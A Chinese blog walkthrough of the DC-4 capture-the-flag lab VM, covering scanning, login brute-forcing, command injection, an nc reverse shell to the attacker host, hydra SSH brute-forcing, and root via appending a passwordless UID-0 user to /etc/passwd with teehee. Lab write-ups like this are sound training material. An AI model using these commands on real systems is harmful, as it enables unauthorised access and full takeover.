DC4靶场渗透流程(超详细)

最新推荐文章于 2024-03-20 14:10:20 发布

tacokings

最新推荐文章于 2024-03-20 14:10:20 发布

阅读量686

点赞数 1

分类专栏： DC靶场系列文章标签： web安全网络安全安全 linux 服务器

本文链接：https://blog.csdn.net/m0_64583632/article/details/130050603

版权

DC靶场系列专栏收录该内容

7 篇文章 0 订阅

订阅专栏

靶机页面

信息收集

查看DC4的IP地址

查看DC4的MAC地址为00:0C:29:90:C6:B0，然后用nmap扫描存活主机，发现DC4的MAC地址对应的IP为192.168.175.158

靶机的web页面

扫描DC4开启的端口

┌──(kali💋kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.158
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-05 23:30 EDT
Nmap scan report for 192.168.175.158
Host is up (0.00076s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:90:C6:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 192.168.175.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds

端口	状态	服务	版本
22	open	ssh	OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80	open	http	nginx 1.15.10

web应用指纹信息

nikto报告

┌──(kali💋kali)-[~]
└─$ nikto -host http://192.168.175.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.175.158
+ Target Hostname:    192.168.175.158
+ Target Port:        80
+ Start Time:         2023-04-05 23:23:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-04-05 23:23:58 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

渗透流程

登录框账户名密码暴力破解

使用brupsuite抓包，然后选择一个比较好的密码字典，对密码进行爆破

账户名为admin，密码为happy，登录

远程命令执行

登录进行后发现可以执行命令，比如列出文件列表

这时候想着是否能执行我们想要的命令呢？使用brupsuite抓包看看是否能修改为执行其他命令，比如whoami，看到能执行成功

接下来我们就可以利用这个远程命令执行来反弹shell

nc -e /bin/bash 192.168.175.144 1444

用kali监听1444端口，然后成功反弹

进入交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

SSH登录

切换到home目录，发现三个用户charles、jim、sam

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

进入charles和sam目录里面没有发现，但进入jim目录里面有发现

接着进入backups目录里，发现了old-passwords.bak这个文件，打开发现好像是一个密码字典，这时候我们可以想到jim用户ssh连接的密码就在这里

所以接着就利用这个密码字典，进行ssh爆破

先把这些密码在本地导入新文件，总共252条密码

接下来就用hydra爆破密码

hydra ssh://192.168.175.158 -l jim -P jim.dic -vV -f -t 64

账户名jim，密码jibril04

ssh登录

权限提升

查看mbox 文件，怀疑有邮件服务器

发现另外一封邮件,切换到var/mail,查看jim文件

发现charles把密码发给了jim，charles密码为^xHhA&hvim0y

接下来用charles这个用户进行ssh登录

查看sudo权限

sudo -l

发现使用/usr/bin/teehee 切换到root权限是不需要密码

teehee提权：

teehee命令可以对文件进行写入操作，我们可以借此来提权。

就是使用teehee -a 把一个账号密码写入到etc/passwd中，这个用户具有root权限，再切换到这个用户即可。

passwd的格式：[⽤户名]：[密码]：[UID]：[GID]：[⾝份描述]：[主⽬录]：[登录shell]

向/etc/passwd 文件中追加用户

echo "tacoking::0:0:::/bin/bash" | sudo teehee -a /etc/passwd #提权语句，追加用户

charles@dc-4:~$ su tacoking
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)

查看flag

root@dc-4:/home/charles# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt

888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888 "Y88b                            888 888 888 888
888 d8b 888          888 888      888    888                            888 888 888 888
888 d888b 888 .d88b. 888 888      888    888 .d88b. 88888b.   .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888      888    888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888 .d88P Y88..88P 888 888 Y8b.      "   "   "   "
888P     Y888 "Y8888 888 888      8888888P"   "Y88P" 888 888 "Y8888 888 888 888 888

Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.